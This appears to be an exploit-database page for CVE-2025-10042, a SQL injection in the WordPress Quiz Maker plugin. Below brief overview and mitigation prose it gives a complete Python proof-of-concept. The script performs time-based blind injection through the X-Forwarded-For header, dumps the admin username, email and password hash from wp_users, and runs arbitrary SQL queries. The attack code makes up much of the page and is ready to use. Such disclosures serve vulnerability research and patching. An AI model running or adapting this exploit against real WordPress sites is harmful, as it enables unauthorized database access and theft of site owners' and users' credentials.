Skip to main content
Home/Exploits/WebApps/WordPress Quiz Maker 6.7.0.56 – SQL Injection
EXPLOIT HIGH (8.8)

WordPress Quiz Maker 6.7.0.56 – SQL Injection

CVE ID: CVE-2025-10042
Vulnerability Type: SQL Injection
Author: Rahul Sreenivasan
Categories: WebApps

Overview

The WordPress Quiz Maker version 6.7.0.56 has been identified with a critical SQL Injection vulnerability (CVE ID: CVE-2025-10042). This vulnerability allows attackers to manipulate database queries by injecting malicious SQL code through user inputs, potentially compromising the integrity and confidentiality of the database.

Technical Details

This vulnerability resides in the way the WordPress Quiz Maker processes input data from users. Specifically, it fails to properly sanitize and validate user inputs before integrating them into SQL queries. An attacker can exploit this flaw by submitting crafted input that alters the structure of the SQL query, enabling unauthorized access to the database. For example, an attacker could use a payload like ‘ OR ‘1’=’1 to bypass authentication checks and retrieve sensitive information.

Once the SQL injection is successful, attackers can execute a range of malicious activities, such as data exfiltration, data manipulation, or even complete database takeover. The severity of this vulnerability is heightened by the prevalence of WordPress sites using this plugin, making it a prime target for cybercriminals.

Impact

The potential consequences of this vulnerability are significant. Attackers could gain unauthorized access to sensitive user data, including personal information and credentials. This breach could lead to identity theft, financial loss, and damage to the reputation of the affected organizations. Furthermore, the compromised data could be used in further attacks, amplifying the risk to other interconnected systems.

Mitigation

To protect against CVE-2025-10042, it is crucial for security professionals to take immediate action. First, update the WordPress Quiz Maker plugin to the latest version, as patches are often released to address known vulnerabilities. Regularly monitoring and applying updates to all WordPress plugins and themes is a best practice in maintaining security.

Additionally, implementing web application firewalls (WAFs) can help filter out malicious traffic and prevent SQL injection attempts. Employing input validation and sanitization techniques within the application code can further mitigate the risk. Security assessments and penetration testing should also be conducted regularly to identify and address potential vulnerabilities before they can be exploited.

Proof of Concept (PoC)

poc.py 
# Exploit Title: WordPress Quiz Maker 6.7.0.56 - SQL Injection
# Date: 2025-12-16
# Exploit Author: Rahul Sreenivasan (Tr0j4n)
# Vendor Homepage: https://ays-pro.com/wordpress/quiz-maker
# Software Link: https://wordpress.org/plugins/quiz-maker/
# Version: <= 6.7.0.56
# Tested on: WordPress 6.x with Quiz Maker 6.7.0.56 on Ubuntu/Nginx/PHP-FPM
# CVE: CVE-2025-10042

from argparse import ArgumentParser
from requests import get
from requests.packages.urllib3 import disable_warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from time import time
from sys import exit

disable_warnings(InsecureRequestWarning)

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$/:?"

def send_payload(url, path, header, payload, timeout):
    target = f"{url.rstrip('/')}/{path.lstrip('/')}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        header: payload
    }
    try:
        start = time()
        get(target, headers=headers, timeout=timeout, verify=False)
        return time() - start
    except:
        return timeout

def check_vulnerable(url, path, header, sleep_time, timeout):
    print("[*] Testing for SQL injection vulnerability...")
    
    baseline = send_payload(url, path, header, "127.0.0.1", timeout)
    print(f"[*] Baseline response time: {baseline:.2f}s")
    
    payload = f"1' OR SLEEP({sleep_time})#"
    injection = send_payload(url, path, header, payload, timeout)
    print(f"[*] Injection response time: {injection:.2f}s")
    
    if injection >= sleep_time * 0.7:
        print("[+] Target is VULNERABLE!")
        return True
    else:
        print("[-] Target does not appear to be vulnerable.")
        return False

def extract_length(url, path, header, query, timeout):
    low, high = 1, 100
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(LENGTH(({query}))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    return low

def extract_char(url, path, header, query, position, timeout):
    low, high = 32, 126
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(ASCII(SUBSTRING(({query}),{position},1))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    return chr(low) if low <= 126 else "?"

def extract_data(url, path, header, query, timeout):
    length = extract_length(url, path, header, query, timeout)
    print(f"[*] Data length: {length}")
    
    result = ""
    for i in range(1, length + 1):
        char = extract_char(url, path, header, query, i, timeout)
        result += char
        print(f"r[*] Extracting: {result}", end="", flush=True)
    
    print()
    return result

def dump_users(url, path, header, timeout):
    print("n[*] Extracting WordPress admin users...")
    
    # Get admin user login
    query = "SELECT user_login FROM wp_users WHERE ID=1"
    username = extract_data(url, path, header, query, timeout)
    print(f"[+] Username: {username}")
    
    # Get admin email
    query = "SELECT user_email FROM wp_users WHERE ID=1"
    email = extract_data(url, path, header, query, timeout)
    print(f"[+] Email: {email}")
    
    # Get password hash
    query = "SELECT user_pass FROM wp_users WHERE ID=1"
    password = extract_data(url, path, header, query, timeout)
    print(f"[+] Password Hash: {password}")
    
    return username, email, password

def main():
    parser = ArgumentParser(description="WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL")
    parser.add_argument("-p", "--path", required=True, help="Path to quiz page")
    parser.add_argument("-H", "--header", default="X-Forwarded-For", help="Header for injection")
    parser.add_argument("-t", "--timeout", type=int, default=10, help="Request timeout")
    parser.add_argument("--check", action="store_true", help="Only check vulnerability")
    parser.add_argument("--dump", action="store_true", help="Dump admin credentials")
    parser.add_argument("--query", help="Custom SQL query to extract")
    args = parser.parse_args()
    
    print("[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    print(f"[+] Target: {args.url}")
    
    if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):
        exit(1)
    
    if args.check:
        exit(0)
    
    if args.dump:
        dump_users(args.url, args.path, args.header, args.timeout)
    elif args.query:
        print(f"n[*] Executing custom query: {args.query}")
        result = extract_data(args.url, args.path, args.header, args.query, args.timeout)
        print(f"[+] Result: {result}")
    else:
        dump_users(args.url, args.path, args.header, args.timeout)

if __name__ == "__main__":
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...